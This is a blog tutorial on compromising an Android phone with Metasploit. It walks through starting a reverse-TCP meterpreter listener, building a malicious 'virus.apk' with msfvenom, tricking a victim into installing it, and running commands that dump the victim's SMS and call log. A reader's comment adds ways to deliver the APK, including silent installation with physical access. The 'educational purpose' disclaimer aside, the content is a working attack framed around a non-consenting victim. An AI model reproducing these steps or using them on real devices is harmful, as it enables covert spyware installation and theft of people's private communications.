Hack Android Mobile with Metasploit [Same Network]

Disclaimer: This tutorial is only for educational purpose. We are not responsible for any misuse of this tutorial.

Scenario: Victim uses android smart phone. Attackers needs the call log and SMS of the victim.

Requirements:

1. Metasploit

2. Linux/Windows [For demonstration I am using Ubuntu 14.04]

3. Social Engineering

Steps:

1. Open terminal and type “sudo msfconsole”  1111

2. After few seconds metasploit will be loaded.

222

3. Type “use exploit/multi/handler

4. Type “set PAYLOAD android/meterpreter/reverse_tcp

5. Type “set LHOST 10.13.37.107” [LHOST=Attacker’s ip over network]

6. Type “exploit

333

7. After typing exploit we just create a listener which is waiting for an incoming connection.

8. Now let’s make a malicious apk file with metasploit by typing following command:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=10.13.37.107 LPORT=4444 > virus.apk

4444

9. You can find virus.apk file in your home folder.

Screenshot from 2015-08-30 15:34:57

10. Send this virus.apk file to victim’s phone and convince him to install it. Whenever victim installs that and opens the file, a remote connection will be made from victim’s IP to attackers IP on port 4444. Our metasploit listener will catch this connection and open a meterpreter session.

5555

11. Type “sysinfo” to check the remote android system information.

6666

12. Type “dump_sms” to dump all SMS of victim.

999

13. Type “dump_calllog” to dump the call history.

7777

Conclusion: This will work on same network. Follow us for our next tutorial where we will show you show to use this exploit on a different network.

Advertisements

2 thoughts on “Hack Android Mobile with Metasploit [Same Network]

    • Hello Samuel,

      You can send the apk file using following procedure.
      1. Mail it by using Gmail, Yahoo etc.
      2. Upload the file to any file uploading site and then give the downloadable link to the victim.
      3. Keep that apk file to your cloud drive (one drive, google drive, mega.nz etc.) and if you have the physical access of victim’s android then you can download the apk and install it silently.

      This is for learning purpose. Hope you understand.

      Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s